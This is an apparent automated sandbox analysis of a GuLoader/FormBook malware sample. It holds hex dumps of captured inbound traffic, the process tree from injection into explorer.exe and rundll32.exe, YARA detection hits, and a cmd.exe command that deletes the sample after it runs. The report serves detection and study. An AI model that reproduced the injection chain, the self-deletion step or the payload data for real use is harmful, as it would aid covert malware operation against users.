2021-11-25 12:01:33 UTC	539	IN	Data Raw: 77 74 a8 2a 4b e2 06 58 96 8d ca 8d 97 65 ff 91 4b 09 4b d8 7f 8a 8e 9a b1 7a 27 ad e7 be 0a c7 2a 84 66 f3 ed 22 14 a0 8a ab 86 86 a0 57 c7 6f 49 8f 15 82 df 06 4e ee 1b 5c 2f df ae ed cb 0c b3 38 49 dc d3 b9 ea 5e c8 37 11 ee 80 f9 3c 02 88 cf ac d7 f7 ec fc a8 71 ea 2c b6 70 94 26 40 07 5d ce 15 cb fa 24 65 43 be 34 b0 53 91 40 fd 60 7e 3a 3b 2a 60 f3 8c 2f 3f bd d9 42 87 58 a9 8f 58 3c c4 93 32 74 55 f4 6e a1 4c b1 6e 83 75 68 2a 4a 63 ea cb 02 48 d2 d8 d5 9a a0 b7 fc 06 03 1a 56 ba 3f 46 4b 5c dd a9 e8 2a 7d df fb 81 e2 7b b7 60 72 c7 5b 59 a1 35 ca e0 7f 37 65 86 21 06 3e e0 0d 95 41 ac 28 fe 43 2b 31 3d d3 fc 21 7d 45 2e f3 d0 cb b9 1f 31 33 22 df 1d 92 a1 fe 51 3d dd d7 2a 99 ee d0 7d 36 26 61 80 a9 c0 f3 18 39 8e 12 f9 c0 d1 a8 15 3d 5f 2f c9 82 Data Ascii: wtKXeKKz'f"WoIN\/8I^7<q,p&@]$eC4S@`~:;`/?BXX<2tUnLnuhJcHV?FK\}{`r[Y57e!>A(C+1=!}E.13"Q=}6&a9=_/
2021-11-25 12:01:33 UTC	546	IN	Data Raw: 93 f7 95 01 1c e9 c9 90 db 44 18 c7 57 d0 65 23 22 c6 e3 c8 e8 80 e5 ee 48 59 19 f8 44 3f 5a 75 8b ab f1 fd 5b 06 57 6a 17 2d b3 e0 72 42 bc f5 13 a7 75 1a 9a c1 ad fe 4f cd 14 9e 03 2b 88 7c 5c 2d de ce 87 bc 11 6a 59 ba 4d fb c2 82 cd 64 f5 a3 d0 35 13 1f 03 48 7d 4f 0b ae 21 9c 2e 3f af ea b2 ed b3 c9 a7 85 bf 28 3a d8 92 a5 97 f7 58 6e 54 5d 55 59 b9 c8 70 61 b3 c5 12 1d 94 99 4b 0e 46 70 95 fa 71 be 7a 19 bc 37 de 26 a5 ab 9b 17 51 14 dd 66 56 fe 0b e3 d4 a9 5b fb d2 71 2a 86 9d 04 9d 71 a0 dc f7 dd 00 fe b7 47 c8 ef 63 22 56 3c c7 bd c8 38 c9 13 86 fc 3d f0 20 87 af 9f 46 1e bd bf 5e a8 85 3e 73 78 06 b5 45 c5 62 eb 73 8f eb ec e4 1d 01 2e 4d 1c 89 c4 3d 54 c8 fe f1 95 7c 0b c4 4a 71 37 e0 19 d0 dd ba 8d e7 1d bd fb 49 18 0f 47 81 bc 97 af b3 93 75 Data Ascii: DWe#"HYD?Zu[Wj-rBuO+\|\-jYMd5H}O!.?(:XnT]UYpaKFpqz7&QfV[q*qGc"V<8= F^>sxEbs.M=T\|Jq7IGu
2021-11-25 12:01:33 UTC	554	IN	Data Raw: c0 96 49 cd 9d e3 59 af 89 f3 bf ba ca 96 50 ca eb d6 6b 0f df e2 39 a1 bb e1 71 2e dc 70 7c b3 fe b1 3d 5a dc 17 19 2b c5 8d eb ec 96 69 78 a3 1f 61 30 c4 3d f9 58 2a 3d 95 1a 3b 1d 02 8e c8 9c 35 3b 7e 33 01 91 2c 2a 2a e7 1e 0f cd 58 3e c2 7d c3 1e be 57 d0 1f 43 a8 e9 b1 e1 65 65 8f aa 09 4a 95 40 0a 95 59 2c 47 21 76 34 1d 92 67 77 b4 2e 95 22 53 5b 16 a9 33 38 85 97 9e ad c7 bd cf 33 ae fe 8a e3 4d 65 3b a0 e3 f1 b3 28 45 95 ae 00 8d 57 13 4d a2 aa e7 81 51 61 d0 3a 4f 10 b9 23 68 07 29 52 ac 1b 34 1a 61 05 ca c5 07 d4 3b 5c 3e 99 97 0f cd 2b b8 2b 47 dc 01 59 73 a3 f9 e5 7c 3f 1b 4f 39 e3 d8 ea e1 2b 3d 52 83 f5 59 f7 1d 9b 93 18 ea 77 43 8c 82 0e dd 90 bb 77 55 02 41 de 8a 0f f8 0c 72 5a 48 d7 a8 76 d4 12 f4 7a 30 0e 5a 2a c4 bb ed d6 7e f9 92 16 Data Ascii: IYPk9q.p\|=Z+ixa0=X=;5;~3,X>}WCeeJ@Y,G!v4gw."S[383Me;(EWMQa:O#h)R4a;\>++GYs\|?O9+=RYwCwUArZHvz0Z~
2021-11-25 12:01:33 UTC	562	IN	Data Raw: d9 61 6f 9a c0 da 28 6c 0e 3e cf 1c 0f cd c0 4e 75 e2 54 1f 7d 92 f6 a6 e5 a7 f5 96 5f 8a 39 27 ba 8a b0 99 c5 e0 6f f7 4e fa 16 01 e5 46 de 9b 99 66 19 1e 4a 44 f4 f9 58 fd a9 f2 38 3b 90 ca df 9e bb d7 ce 69 bc 3d fb dc 3c 66 a3 83 fc 36 c4 d7 df 90 46 f9 ed 98 c1 19 e5 92 ef 07 e3 d5 a0 c6 9e 0c 9f a1 f3 01 b6 26 8a dc 6e 40 af d8 f1 6a f2 6f 49 47 4d 9a 61 a8 50 68 a6 5e 83 b1 ea 10 ba 8f 83 79 f0 48 37 81 5d 3a 2c d7 d3 4f 62 6f 86 cc 10 4b 6b e4 46 6a 3c 85 6d 30 1a 8a fd 2e c0 e1 22 97 b9 91 35 f3 67 4f ee e9 a3 6b ec db 09 97 c6 d6 80 fa 8d 42 c3 7f 55 eb 49 b2 62 a0 8f 86 06 be 98 42 d4 c3 6b 57 f3 bf 35 86 89 96 57 6c 93 e6 c5 a6 da 7e 9a b0 78 d2 8b 73 11 59 e1 4d 0a 08 6f 0b ad 00 15 c0 e5 05 92 b6 f2 45 9f 32 67 c6 e4 ff 73 cb 17 f0 19 02 7d Data Ascii: ao(l>NuT}_9'oNFfJDX8;i=<f6F&n@joIGMaPh^yH7]:,OboKkFj<m0."5gOkBUIbBkW5Wl~xsYMoE2gs}
2021-11-25 12:01:33 UTC	570	IN	Data Raw: 9f 4f 06 44 ed 3a 67 59 cc 84 6b 7b 2d c1 d9 f8 20 b1 c6 eb c2 28 b5 b6 fb a1 11 3e 80 aa 47 c1 50 98 fd bc ce de 3a 95 60 64 17 67 4e eb 32 49 be b4 0c d6 ba f8 9e 04 71 98 1b 82 3e 4a 26 25 b9 37 fd 1b 7c cf 67 ba 33 36 67 d4 00 9a 55 17 45 a0 fa bd 7e 1f f2 d7 03 23 43 a8 de 65 00 d3 08 03 ac 26 b0 2c 8c 9f 1e c0 da e5 37 2a 35 8f e7 cb 8b 47 8d 80 aa 84 3c 1a d1 1c 19 3b 59 32 00 ee a6 ee 0b 4e c7 d6 f8 60 ad b4 4e 79 42 75 54 88 f2 ab de 03 1b 96 83 4b 6a df 54 a9 aa 6e b0 e1 59 b2 15 34 66 e8 e4 10 64 a7 08 47 f3 f3 61 15 2e 78 ed a5 b0 da 42 62 c8 f5 ec fc 71 c6 15 d3 b6 70 90 fc de b0 d8 4c 15 cb a1 22 0d 1e 81 48 b6 16 0c 62 9e ee 76 33 fb 7a 62 30 2c a9 7a 45 06 87 0c 22 52 7a 0a 6c 7d d4 5c 7b 06 25 f8 e3 42 5f 87 a5 38 68 74 4a 91 e5 5e e3 9d Data Ascii: OD:gYk{- (>GP:`dgN2Iq>J&%7\|g36gUE~#Ce&,7*5G<;Y2N`NyBuTKjTnY4fdGa.xBbqpL"Hbv3zb0,zE"Rzl}\{%B_8htJ^
2021-11-25 12:01:33 UTC	578	IN	Data Raw: bf 18 09 42 e2 32 a7 0c 30 08 90 55 a3 2b b9 b8 84 1b 45 41 c0 82 0d f4 a3 b8 a8 a1 ae bf 2b 47 44 a8 2c 5b 84 87 82 7f c9 9b 6b 1f 6d 0d b8 2e 97 55 5e a3 b2 0e 82 ab fc 9e 64 d2 e3 db 86 9e 55 b0 a9 d1 f2 bb 97 b6 96 fa 25 c7 54 b7 c9 14 13 bd 1a af 9d 05 6a aa a7 80 ec cb a8 16 a0 38 10 e8 a8 69 ce d4 d1 a9 3f 51 0b 5a 61 f5 31 26 f6 f7 f7 5b 80 8e be bc fb 2f 27 9a 5b da 49 41 39 43 cd ac 92 7a 02 0f 2b d8 c9 56 b9 b8 cf 20 50 fb 06 c6 18 70 c4 62 b4 de 90 85 2b 5f e3 7d e5 8a 74 3e 54 ff 48 54 54 be b8 3b 55 e8 b3 16 07 4a 4b ff 86 83 6a 3d 2b c7 d1 3a ff 68 e3 f2 7c ee 76 ae 25 a6 a4 93 50 16 ff 63 44 28 38 44 cb 23 44 7e be 0e 8c a1 9e 33 02 54 7b ba 5d 74 3d 0e c7 eb 9c 51 cc db 9e 55 ea f2 fa 73 c5 2e 92 50 b4 6c 89 16 c5 98 1b 85 5a 11 b1 98 fc Data Ascii: B20U+EA+GD,[km.U^dU%Tj8i?QZa1&[/'[IA9Cz+V Ppb+_}t>THTT;UJKj=+:h\|v%PcD(8D#D~3T{]t=QUs.PlZ
2021-11-25 12:01:33 UTC	585	IN	Data Raw: 5d 34 b0 7b e5 91 6f 0b 13 20 17 da 67 57 a0 87 bf 95 4b 66 08 4b b8 f4 c4 76 99 4f 85 62 02 7e 7d c1 73 21 d0 bf 49 0d d8 7a 64 07 5f 4f ce 97 0a dc 94 26 24 cc a7 4c 6b 2f f2 7e d5 0d 1a 2d 1f 6b 5e d1 6c 73 4e 35 71 98 45 e0 30 a7 b3 8d e3 5d 52 d7 4c df 66 ca 50 e6 9e f9 db cb 67 4b 61 1b 57 48 5b 67 11 3f fc 47 11 41 a9 1b 47 a7 b8 c5 bd 5d 66 f8 13 45 90 28 7e 19 90 4b 33 56 49 07 39 04 76 b3 75 01 cd 93 5b ed 1d e3 5a db 2b d2 ec 35 77 76 79 03 df f5 d3 92 6d 4f 01 fe 86 4d 0b 07 3e 66 8d d9 0e c0 9b 7e cd be c2 80 5c 5e d5 b2 e2 15 84 2d 45 89 c4 ba e9 61 08 90 3f fe fe 22 7e ec 44 62 1b 5a 49 79 0a e9 f7 34 42 40 f0 a0 0a 7b 2a fd 43 2e b3 1f cf 90 f7 b9 c5 01 85 38 a2 62 bc 74 89 5f c5 3a 50 99 72 7b 4a 7a e7 4f 3e 3f 4f 01 07 17 8f 87 bb 3b 67 Data Ascii: ]4{o gWKfKvOb~}s!Izd_O&$Lk/~-k^lsN5qE0]RLfPgKaWH[g?GAG]fE(~K3VI9vu[Z+5wvymOM>f~\^-Ea?"~DbZIy4B@{*C.8bt_:Pr{JzO>?O;g
2021-11-25 12:01:33 UTC	593	IN	Data Raw: 18 ba d6 5f 31 8a 16 79 cd 91 4e f2 19 c0 f5 c6 18 df fe 49 41 a4 f9 01 01 c3 25 55 8b 7b b0 39 2d 43 7e f3 c0 eb 7a 5c d6 bc fe 7c 4e d0 ba 11 1e a4 17 b2 32 49 ce c7 7a 4e 8d b9 60 b8 33 b8 6d 1a 1d 83 d0 d2 a9 67 fc d6 70 ec 9d f4 a6 bd 6e 42 bd d6 80 76 ef df da 0d c8 05 47 ad b3 dd 5f 07 09 ba 73 79 96 b3 61 05 11 76 d1 62 e7 5f 5d 42 68 6b 6c b0 7c 3b c2 95 30 81 73 b3 09 38 ae 72 9e b7 c4 97 c2 e7 ca 91 83 30 b2 cf da aa 1b fa 3a 81 b4 90 12 de 6a 7a 66 5f cd b1 6d 9d 5a a9 e4 12 33 71 2f d1 0b 58 c2 41 59 a7 9f ae 57 ba da c6 cc be ec e5 b7 ad 90 16 3f 23 18 f1 78 a1 e6 64 42 92 13 28 a0 11 10 8f b0 25 fd b6 ab df 1c b7 53 bf bf 30 99 84 a1 6d 4f f4 d6 6f 06 a3 69 83 2a ac 32 1f 4d b2 91 8a a4 51 6c 98 d7 6d 3d 14 3f df 56 31 39 ed d0 3c ce ab fb Data Ascii: _1yNIA%U{9-C~z\\|N2IzN`3mgpnBvG_syavb_]Bhkl\|;0s8r0:jzf_mZ3q/XAYW?#xdB(%S0mOoi*2MQlm=?V19<
2021-11-25 12:01:33 UTC	601	IN	Data Raw: 6f 5d 45 95 9d 3b a9 46 1e a9 07 f0 80 ff 1a c7 4e 4d 60 f6 d3 24 ac 27 97 eb 78 e5 e4 a6 88 9b a3 fe 0a 74 0e 32 12 df 1c 3c 25 9c 0d 2f 91 02 62 3f c4 89 de 67 b4 4f 61 d8 7a 83 b1 61 55 39 e2 4b e9 6d 26 98 ce 55 e1 11 d3 32 0a 3d 68 6d c2 66 1b 83 d9 97 18 4e 47 56 c3 60 20 88 38 c2 f3 2e dc 30 4a 41 70 12 57 8b 03 ae 63 67 16 90 d4 ff a2 0a 98 d8 40 7d 17 e4 00 b6 c0 64 24 7c a8 16 dd 07 f1 21 cb 98 d6 27 39 3d a7 ec d0 07 2c eb ec 90 aa 8a 15 2e 68 5a 7f f1 9d 84 a6 31 df ee 0b 8b 7e be e3 e4 18 74 97 3f a2 a3 1d c8 16 63 da a7 49 8b 0a 4a 33 fa ff eb 53 3a 00 88 5f 82 e3 3f 29 fa c7 ef 47 6c 78 5b e4 49 ea 16 1c 84 e2 89 05 a2 3e 18 1a ef 81 a1 0f 5d 66 05 cd 9e e9 a7 39 c4 3a 1c be 6a b9 84 90 82 b3 2e 12 4f 3a 26 41 41 75 54 5d 38 69 c3 3e 92 18 Data Ascii: o]E;FNM`$'xt2<%/b?gOazaU9Km&U2=hmfNGV` 8.0JApWcg@}d$\|!'9=,.hZ1~t?cIJ3S:_?)Glx[I>]f9:j.O:&AAuT]8i>
2021-11-25 12:01:33 UTC	609	IN	Data Raw: d7 10 b6 98 45 cc 3c 2d e9 70 9f 88 67 fe 72 93 45 00 1d c6 9b 03 23 12 a3 77 0d e2 5b ea 8b 15 f5 ba d5 3d 5c f6 4b d5 b4 61 9a 8b a9 6f 43 88 8a 8c 8b 8c 4b 9c 87 62 97 fc 66 9a e9 3a 8b 21 e2 b2 c7 2e 5d 99 66 5c 78 22 51 43 75 54 53 c8 c8 23 b0 18 90 8e c2 88 20 f9 e7 07 96 e0 6a df 0a d1 5c ee 31 e7 97 dd 65 b8 ea 5e 61 df 9c 7b 80 05 9b 3e b2 ca 61 57 2f 53 80 be 77 ea 10 dd b4 a0 a3 80 50 1a 24 9d 43 72 21 01 d4 a0 34 b0 c1 91 5d 15 60 7e 61 38 93 3d 97 2b db fc 55 54 d7 87 a4 0e b3 e3 73 cf 7b 28 b7 bd 77 aa b1 13 51 ac eb fd e0 fc 49 6f 15 ea 97 ba 9c b5 d5 66 5f 48 f4 93 02 76 00 bb 3f 08 2e 5c 21 56 17 23 56 e8 85 35 1c 3e 28 88 72 c7 3d d0 6d b3 23 00 73 36 17 c0 c9 fa c1 1f 5d 25 47 a2 a7 7e 30 58 b7 d5 2f 03 de 2c 4b 05 5d 85 a9 b9 63 36 fb Data Ascii: E<-pgrE#w[=\KaoCKbf:!.]f\x"QCuTS# j\1e^a{>aW/SwP$Cr!4]`~a8=+UTs{(wQIof_Hv?.\!V#V5>(r=m#s6]%G~0X/,K]c6
2021-11-25 12:01:33 UTC	617	IN	Data Raw: 77 d8 7b 6b 2a 25 48 05 38 5e 9d dc f4 d5 3c 5d e0 6e e4 c8 68 e7 36 a5 16 5a 57 9b 93 9c 0c 60 78 8c 64 f7 4c 19 9e c8 33 5e 88 6e cf 74 36 3e 04 4f 09 ea ed c5 a0 59 b6 9e df dd 6e 38 70 0d 5c e9 b5 4b 39 d8 0d a4 54 49 21 d1 5c 77 d0 6c a6 50 75 c9 e3 e0 58 c7 6a 53 79 02 74 05 5a ae 8a d6 83 0c 58 7a 6f c3 4a 54 b1 aa 7c 6a 0f 22 66 7e da 93 a1 94 3f 56 58 62 52 0b 69 bb 7a 3d fe bf a3 32 07 83 f0 9d b1 c9 a2 64 07 f7 ea 9b 79 6d d3 30 72 a2 49 17 2d e3 35 af 55 f3 b4 aa e4 70 ed 05 8c f2 a5 de b7 08 77 56 fa 52 c8 9d d8 10 54 46 9e ec 20 66 3a a1 4b 55 3f 11 a6 fd ca f1 2c cc a6 18 1b b6 02 21 ec f3 55 2b 67 16 d5 86 01 3b 2b 8a 92 86 c5 87 df 33 ce 8f 80 ef cf dd 67 9a 1c b9 12 3e cb a2 d2 53 e6 59 a9 4a 31 bf 19 18 a0 d3 d9 df 5e d1 42 b2 1e f3 e0 Data Ascii: w{k*%H8^<]nh6ZW`xdL3^nt6>OYn8p\K9TI!\wlPuXjSytZXzoJT\|j"f~?VXbRiz=2dym0rI-5UpwVRTF f:KU?,!U+g;+3g>SYJ1^B
2021-11-25 12:01:33 UTC	625	IN	Data Raw: cb 25 e9 09 0a 08 6c 8d 8b 5b 75 bd f1 b1 f1 0d 75 87 30 c0 6a 79 ca 9a 11 96 39 85 12 83 5b ec cb c2 11 25 bf 7d 84 49 61 87 75 48 20 d3 77 54 80 6d 37 d6 21 5f f7 3a 47 51 af d0 51 81 fa 8a 4c 26 63 57 94 fd 3d f7 d7 e7 68 b1 73 f4 97 f4 f0 c4 79 dc 51 18 5c 96 56 23 ea 00 35 e3 40 c1 24 d2 f5 1f 01 93 c3 f7 73 79 10 02 14 f7 8c dc 89 2c 3a a8 84 ad 05 81 69 03 54 95 e9 ca 86 f7 b0 f1 15 f7 7d 81 31 5b 95 bd 4d a1 3e ad a4 0a e6 54 40 fb f9 20 09 aa a8 80 88 2a fa e5 0f 89 3a 3b 4a b9 ec cd bc e4 2e 6f 43 f4 1e ae 6d 18 75 46 3c a5 4f db 34 9c 46 8e ce 9b b1 93 43 fc eb f1 43 76 76 eb 4c a0 b4 c5 7d 49 44 3b f3 22 61 46 c5 ac ed ca af ad b4 eb d0 ab 13 80 af 21 78 a0 df c5 1c 87 fc 15 80 eb 65 84 73 26 72 96 b3 fe 20 21 79 fd 60 2f 60 a9 6c ec f9 cf 4a Data Ascii: %l[uu0jy9[%}IauH wTm7!_:GQQL&cW=hsyQ\V#5@$sy,:iT}1[M>T@ *:;J.oCmuF<O4FCCvvL}ID;"aF!xes&r !y`/`lJ
2021-11-25 12:01:33 UTC	632	IN	Data Raw: 14 27 0b 9e 3f 22 e9 e1 4b d7 fd cc 2a a7 20 d8 27 4a 9c 34 f2 fa 06 6b 51 fe e8 1e ef d9 65 5a 30 88 ae 98 ec 32 c0 2b 3b f3 6b 7d 5e 83 15 29 c8 e7 62 72 4f 8c 26 85 aa fa cf 66 09 05 02 d1 12 ae 29 d8 86 31 29 1e 97 c9 89 c3 d7 06 9f 65 8f 3e c1 85 6c 36 fd 3c 3a 7e 39 a8 d8 ce 56 6a 11 ec 96 bb 06 9e 1f bc d1 08 55 d1 21 b0 f2 d2 e2 af 1c ad d9 fa 80 cc be 13 3c 63 f4 d9 29 6d 36 61 01 2a 29 84 0d 19 8f 4a 65 9a 08 8d 93 60 57 20 9a 19 ec 50 27 97 5c da 73 d2 4a 49 73 64 fa ee 91 c5 c2 e5 69 16 f4 3e 59 92 80 2c 94 20 8f 45 08 cb 2d 15 35 8f f3 4b 37 e6 65 cb bc 8e 2c d3 63 82 f4 81 74 54 03 3b 09 9d 85 4e da 1e a3 23 5a 54 72 7d 03 30 a8 bb 60 2e 83 4e dc 16 7d ef fe 6e 6d 33 b1 f0 a1 64 a6 48 3b 4f 21 2b 9e 7f 39 4d c1 5a 3e 27 bd eb e3 29 c9 27 eb Data Ascii: '?"K* 'J4kQeZ02+;k}^)brO&f)1)e>l6<:~9VjU!<c)m6a*)Je`W P'\sJIsdi>Y, E-5K7e,ctT;N#ZTr}0`.N}nm3dH;O!+9MZ>')'
2021-11-25 12:01:33 UTC	640	IN	Data Raw: 7d ee 93 7c c8 a7 54 e9 e1 5f 44 d4 7b 12 05 02 53 9a 24 be 8f ee 28 6e 94 04 0b e3 80 fc 64 b6 94 90 4d c1 cb 50 70 5b 0c e3 da 4d 13 12 79 c9 d5 39 2c ba 06 19 fa 4f 70 ca 7f cc dd 3d 43 10 1c 4a 6b 80 dd b6 b9 3c e5 4f 38 8b 8b af 80 fd 32 8e 5c 66 e9 be 8e 5c da 58 ce 0c e9 a1 5d fe de 19 6d 15 ec 43 35 f6 8f b6 5d 29 e9 ab ed 8e 13 13 01 6c c1 b6 66 7e 9e d8 ea 93 9e 56 cb 42 90 99 98 79 ca cb d1 d6 aa 89 d0 d6 81 1c 74 cd 82 e0 6b 93 48 f2 0f 9c c2 fb ee f8 ca 1b 76 60 c2 ae ab 9b 5d 07 1d cd 6d 03 39 4b 02 c2 06 5e fa e6 d2 57 5d 95 38 2c aa 8d 0f 9b a8 dd 19 c5 52 b3 1f ad b5 02 25 ab 37 36 60 25 b8 cc cd 2c 39 71 e8 86 57 cc 8d 44 ea 3e 87 9f 5b 0a 60 8b 99 66 aa b4 52 b4 91 ca 69 c7 29 63 93 e4 9e 0c c0 ee 48 c3 41 2a 4b d5 ff 09 33 8b 8f 7e 30 Data Ascii: }\|T_D{S$(ndMPp[My9,Op=CJk<O82\f\X]mC5])lf~VBytkHv`]m9K^W]8,R%76`%,9qWD>[`fRi)cHA*K3~0
2021-11-25 12:01:33 UTC	648	IN	Data Raw: 07 13 23 bb 38 c9 12 7e 8f ba c8 7b 28 f2 25 a6 e8 69 ac ac 9a dd 8f 1d a9 13 57 58 58 e8 63 34 d0 83 66 01 0d 00 6c 4b 59 dd 90 91 dd 19 42 76 7f e8 78 a2 04 fb 83 63 bd 05 c7 d2 0e e1 d9 00 60 8a 34 73 c8 78 3e 5b e7 3e a3 9d ed 5b 1a 06 f0 9f 51 fa 44 a4 95 ae 99 79 f2 2b 5c 9f c0 c4 5b 64 a1 76 e2 26 98 54 b0 67 60 f8 9b a2 b3 6a 1d d4 ac 87 32 f3 54 da 1b 70 52 c3 09 51 1c 05 4a 39 37 8c 1e d5 98 4a dd 10 04 06 0e ab c0 ec de 54 c1 e5 4b e3 9f a9 b5 33 0b 6d 03 3b ea 64 49 a1 8a c4 0d 1b d3 59 41 4a 0d 86 49 38 72 c8 ca cd 5f cf 0c 86 70 a9 fc f7 09 35 b1 a9 71 42 c4 37 f4 b8 4f 18 f7 22 b0 e9 62 6e b5 c8 df 7e 73 f2 93 ab 94 f2 9e 37 6b 95 f3 05 3d 96 36 a0 97 a6 db a5 95 e4 a7 7e 3a e0 e6 ed 80 3b 17 16 ed fc ab d1 bc 64 ff 41 fb eb 91 c1 8e 6f f4 Data Ascii: #8~{(%iWXXc4flKYBvxc`4sx>[>[QDy+\[dv&Tg`j2TpRQJ97JTK3m;dIYAJI8r_p5qB7O"bn~s7k=6~:;dAo

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Zr26f1rL6r.exe PID: 6656 Parent PID: 3436

General

Start time:	12:53:27
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\Zr26f1rL6r.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Zr26f1rL6r.exe"
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Zr26f1rL6r.exe PID: 6600 Parent PID: 6656

General

Start time:	12:54:11
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\Zr26f1rL6r.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Zr26f1rL6r.exe"
Imagebase:	0x400000
File size:	144472 bytes
MD5 hash:	812181DF251E06433BF2F4F6A0C0F0F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 4644 Parent PID: 6600

General

Start time:	12:54:56
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff68e4c0000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 4624 Parent PID: 4644

General

Start time:	12:55:10
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0xd50000
File size:	61440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5276 Parent PID: 4624

General

Start time:	12:55:14
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Imagebase:	0x320000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 424 Parent PID: 5276

General

Start time:	12:55:15
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f4340000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
